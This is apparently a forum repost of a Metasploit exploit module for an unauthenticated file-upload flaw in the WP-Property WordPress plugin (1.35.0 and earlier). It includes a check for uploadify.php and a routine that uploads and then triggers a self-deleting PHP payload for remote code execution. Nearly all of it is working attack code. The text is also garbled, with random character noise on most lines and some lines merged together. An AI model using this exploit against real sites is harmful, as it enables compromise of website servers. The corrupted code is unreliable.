WordPress WP-Property PHP 文件上传漏洞. Q/ W& a: G2 W9 |1 w1 n
1 z3 A% `4 V+ v) s1 X: m2 z1 |
## # This file is part of the Metasploit Framework and may be subject to5 V" f1 n/ ^) _+ y9 I% }0 C: n
& Z) y3 M' b$ B7 g+ C0 X, \# redistribution and commercial restrictions. Please see the Metasploit
; x6 q8 }( \2 O; c( |
* O: J" N; q0 A1 ^% e6 @# Framework web site for more information on licensing and terms of use.
) s/ B" t6 J* q
1 w# _! ? B% o# m& w0 ?# http://metasploit.com/framework/ ##
+ e2 P: y, y0 P0 d1 [) B9 W! l2 p4 r9 |
4 N/ A" M: n/ @( |& Q0 ^) w( |, u5 t& W5 x" z
3 }8 }: H; n- b5 z! Q
: R+ c: N3 f: Y* O0 P' b4 M$ Vrequire 'msf/core'
8 _" k. E% g' U: f% a4 q+ G& brequire 'msf/core/exploit/php_exe'
0 u- o) R+ ], @" ?/ p" }* o9 |# R+ G/ B2 g8 E6 {
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
, |2 G, @8 D/ u& r& F, R. r'Description' => %q{& J# ?) [$ p5 i+ V. b; \
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>0 q: f @; h/ |3 i6 t
[
6 X y1 Q- ~0 }% \; I* r' l$ P P'Sammy FORGIT', # initial discovery
0 \. J4 r# T$ ` F4 a2 ?'James Fitts <fitts.james[at]gmail.com>' # metasploit module: |5 ^ P! ~1 a' R6 R# g
],
0 [4 O6 l- A8 \) e. _'License' => MSF_LICENSE,7 H9 X3 W2 d& X( l- q7 a
'References' =>
F* d& N5 S: V% V[
; b9 n+ F0 Q3 a& q[ 'OSVDB', '82656' ],! y6 j* g9 r: V# R V9 _- b
[ 'BID', '53787' ],2 q( N9 e2 N% e
[ 'EDB', '18987'],
( g2 H3 K. F- ~: A0 z[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]9 k+ s3 i& g0 }/ j# G# [) \
],
& G% c( z( j- f2 Z'Payload' =>6 |3 S* e. y J3 G8 o: x" F4 L
{
% R% Z5 M( r a$ k) [! y* Y+ p1 ^'BadChars' => "\x00",! ]! M, j# y2 x2 a2 J
},+ Q% e' n, ~& q
'Platform' => 'php',
+ G) K! t) f/ A1 c2 B'Arch' => ARCH_PHP,2 ?/ p" L- ^, M; k9 W# u+ l$ z
'Targets' =>/ G" Q5 f3 A- s; [& H) S
[- ]4 e; h: U5 {' Z3 w8 J0 B
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], r! _9 H: \: ^5 d/ U
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]2 _2 v; u& A, L5 B' R
],
( r z2 Z4 y& B0 F6 R. ['DefaultTarget' => 0,
* R8 h" J; W2 d0 i7 i8 F'DisclosureDate' => 'Mar 26 2012'))* |' V m- K8 i9 z( y3 b# N
' }1 e: j9 X2 |7 aregister_options(
9 B2 y' d+ o8 x/ T" v; z7 k4 C[/ G1 O h% K8 G6 p0 R: E/ r
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
! a2 i# j0 i) |; }! X], self.class)% a# u3 ^" M, P* v0 C" P4 r
end% E8 W( W3 j+ Q, d
0 \, o v/ `5 K+ r* L. Xdef check$ D" ~* G: W8 c1 r2 X
uri = target_uri.path( ^1 y. v6 P; ^' m4 [1 Y
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
% Z! L& a6 `& A% u; I; C'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"8 y* a) e% m" A
})& ^ O! _0 E5 I9 |1 Z% Z
; c( _9 v# o. W3 x/ K$ Qif not res or res.code != 200, u% i, b8 ^, F r
return Exploit::CheckCode::Unknown$ \3 s. l3 I+ S2 |
end
: l/ r" i1 w& g3 ^" ]5 ?: x' N+ ~, f- ~+ P( p6 r4 G, y* E
return Exploit::CheckCode::Appears9 k }: v$ U5 P6 w! Q4 W4 ?
end6 c. @5 n1 V$ {( H5 H* h" x* d
0 L6 _+ [7 W* I. W$ mdef exploit" \7 {1 }6 Q/ H2 j
uri = target_uri.path
! v5 e& y% Q4 }2 ^. M# Yuri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
% _9 L6 N& Y/ M2 l5 }- t: @ \6 r! [# i L/ |* z1 D
data = Rex::MIME::Message.new
7 y0 J7 h' B+ {: t. Xdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
1 L4 d! l" D) J1 [0 E$ x; k# k& \data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")% x% d9 ^/ d+ |, {) h9 A4 y
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
$ \; ]4 O% m9 O8 ^. k2 g, C5 y4 ^+ G: d
print_status("#{peer} - Uploading payload #{@payload_name}")2 @6 Y0 E H, p \8 X- v
res = send_request_cgi({6 f3 A& K4 v# t9 D0 w1 G0 ^ g
'method' => 'POST',9 d! P% e. [& I( r2 j: N) J% k
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
9 @+ h7 A! x& h4 S/ L$ s' O'ctype' => "multipart/form-data; boundary=#{data.bound}",
0 `' S/ n ~4 ]# _ S2 B- ?'data' => post_data2 J" \+ N" k1 r& q9 M! P8 E9 s4 X
})
( ?( ?) ], P1 E. ]+ l0 }( A; {. a; }+ N( M" ?2 F
if not res or res.code != 200 or res.body !~ /#{@payload_name}/- n5 M) r9 b) Z9 i1 a5 |+ s6 k
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")6 J( [+ }- d( y/ m
end
0 a8 n. \. r. t6 O8 O! [ b5 i
8 N5 ?/ t) g y; \4 K& xupload_uri = res.body
! _5 l8 S5 @) u: F' V& |5 \5 A/ L$ P( ]
print_status("#{peer} - Executing payload #{@payload_name}")* B2 s; @$ R3 m+ f1 W
res = send_request_raw({
' O, ~4 V8 c% b% c5 r2 c# X5 v'uri' => upload_uri,
7 {" W, U. n$ C. {; q( P'method' => 'GET'2 @! v3 Z- b9 o2 X) O* p! J
}) f: B" R. U0 b, _ j
end M8 K2 W6 a3 T2 t3 B' U k
end
/ s+ N# I( Z2 B. l o4 s
4 O' b: {/ J1 f6 s不要问我这写的是什么 怎么利用 我是说msf.
- k0 V* l- L' d0 y- s
' V1 ~2 r; F- J* O/ F- u |